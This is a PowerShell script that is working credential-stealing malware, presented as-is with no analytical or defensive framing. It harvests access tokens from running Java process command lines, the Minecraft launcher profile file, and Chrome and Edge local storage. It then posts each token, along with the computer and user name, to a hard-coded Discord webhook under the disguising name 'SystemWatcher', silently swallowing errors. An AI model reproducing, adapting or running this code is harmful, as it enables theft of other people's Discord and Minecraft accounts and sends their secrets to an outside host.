$webhook = "https://discord.com/api/webhooks/1490629749159104532/wFu6BV4lrg8HHuNzi10Ii4pMXYkJx0_xDuk5NnOgVDoPvJqwAoPsesebgGKOIm2WZ6Oc"
$computer = $env:COMPUTERNAME
$user = $env:USERNAME

function Send-Discord {
    param($title, $fields)
    $body = @{
        embeds = @(@{
            title = $title
            color = 0x1F8B4C
            fields = $fields
            footer = @{text = "From: $computer\$user"}
        })
        username = "SystemWatcher"
    } | ConvertTo-Json -Depth 10
    try { Invoke-RestMethod -Uri $webhook -Method Post -ContentType "application/json" -Body $body -ErrorAction SilentlyContinue } catch {}
}

# Java Discord tokens
Get-CimInstance -Query "SELECT CommandLine FROM Win32_Process WHERE Name='java.exe'" | ForEach-Object {
    if ($_.CommandLine -match '--accessToken\s+(\S+)') {
        $token = $matches[1]
        $uname = if ($_.CommandLine -match '--username\s+(\S+)') { $matches[1] } else { "Unknown" }
        Send-Discord "Discord Token (Java)" @(
            @{name="Access Token"; value="```$token```"; inline=$false},
            @{name="Username"; value=$uname; inline=$true}
        )
    }
}

# Minecraft tokens
$mcPath = "C:\Users\$user\AppData\Roaming\.minecraft\launcher_profiles.json"
if (Test-Path $mcPath) {
    try {
        $mcData = Get-Content $mcPath -Raw | ConvertFrom-Json
        $token = $mcData.accessToken
        if ($token) {
            Send-Discord "Minecraft Token" @(
                @{name="Access Token"; value="```$token```"; inline=$false}
            )
        }
    } catch {}
}

# Browser Discord tokens
$paths = @(
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Local Storage\leveldb",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Local Storage\leveldb"
)
$tokens = @()
foreach ($p in $paths) {
    if (Test-Path $p) {
        Get-ChildItem "$p\*.ldb" -ErrorAction SilentlyContinue | ForEach-Object {
            $c = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
            $regex = '[\w-]{24,}\.[\w-]{6,}\.[\w-]{27,}'
            $matches = [regex]::Matches($c, $regex)
            foreach ($m in $matches) { $tokens += $m.Value }
        }
    }
}
$tokens = $tokens | Select-Object -Unique
foreach ($t in $tokens) {
    Send-Discord "Discord Token (Browser)" @(
        @{name="Token"; value="```$t```"; inline=$false}
    )
}
